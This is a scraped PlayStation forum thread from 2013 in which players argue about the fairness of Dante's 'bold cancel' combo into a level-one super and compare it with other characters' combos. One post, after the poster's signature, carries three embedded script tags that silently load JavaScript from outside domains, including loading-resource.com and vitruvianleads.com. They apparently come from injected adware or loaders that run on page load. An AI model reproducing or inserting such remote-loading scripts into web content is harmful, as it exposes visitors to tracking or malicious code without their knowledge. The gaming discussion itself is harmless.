Hekseville Citizen
282 posts

Re: Topic: dantes bold cancel

Jan 3, 2013

To address your comments about my post on aylas', i appologize for my harshness. I do not mean to be **bleep**. But the "bold cancel" is utilizing 3 things in under 1 second. 

First, triangle up. This move imo is 100% only used for being cancelled as it is quite worthless in any other means.

Second, Circle over. This move also has absolutely no way of gaining super on it, only used as a dash.

Third, Circle landing. This is what sets up the level one for Dante and all put together takes less time than the animation for the third strike of dantes.

In my opinion, this is as equal as ANY combo into level 1 in the game. Ultimately, it is more difficult than any other combo into super. Also, this requires dante to start his combo on the ground. Even a floating character will fly away on the third strike. This makes him very predictable. I don't understand why dante gets such a bad rep in this regard. Fat princess has honestly about 10 different situational combo ways into level one, including from the air and ground. EC can from the air and ground, and multiple other characters have the ability to do so. 

I remember you mentioning why wouldnt superbot put this in the tutorial then. Well, just like most games, a tutorial is for the basic beginning character and player. That combo is not a basic anything lol, it is very, very difficult to master.

Check out my channel for Combo Videos and Tournament matches!
www.youtube.com/mogilsumi
Message 21 of 25 (82 Views)
Survivor
2454 posts

Jan 4, 2013
@mogilicudi

I accept your apolagy and very big of you to say so much apriciated

And I just believe imo that it shouldn't be into level one, think empty and bold are great because am a Dante main and think it does follow to his game (except dmc1 played it yesterday) but yeah like i said just not into a level 1, its slightly unfair to people you do it on and to have it on ya.

I think if the stun time was just a split second less you could still perform the cancel but not into level 1 that's all.
Message 22 of 25 (76 Views)
0 Likes
Hekseville Citizen
282 posts

Jan 4, 2013

So then do you disagree with all combo's into level one in this game?

Message 23 of 25 (68 Views)
0 Likes
Gaming Beast
2167 posts

Jan 4, 2013
See, this is what I don't understand... you were asking me about how to do Cole's hit confirm, but dislike Dante's. How is this worse than a safe on block half screen hit confirm? Or a safe on block hit confirm that if blocked leads into mixups into other confirms? Or perfectly safe hit confirm off of a long range projectile that in the right conditions leads to super and otherwise leads to combo?<br><br><br>The only real difference is that Dante can build 80 meter in the combo before killing you, but considering his super costs 180 AP, I'd say that's fair.

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 24 of 25 (65 Views)
0 Likes
Hekseville Citizen
282 posts

Jan 4, 2013

Other characters can also build significant super before killing... fatty p can do 90 Smiley Happy

Message 25 of 25 (63 Views)
0 Likes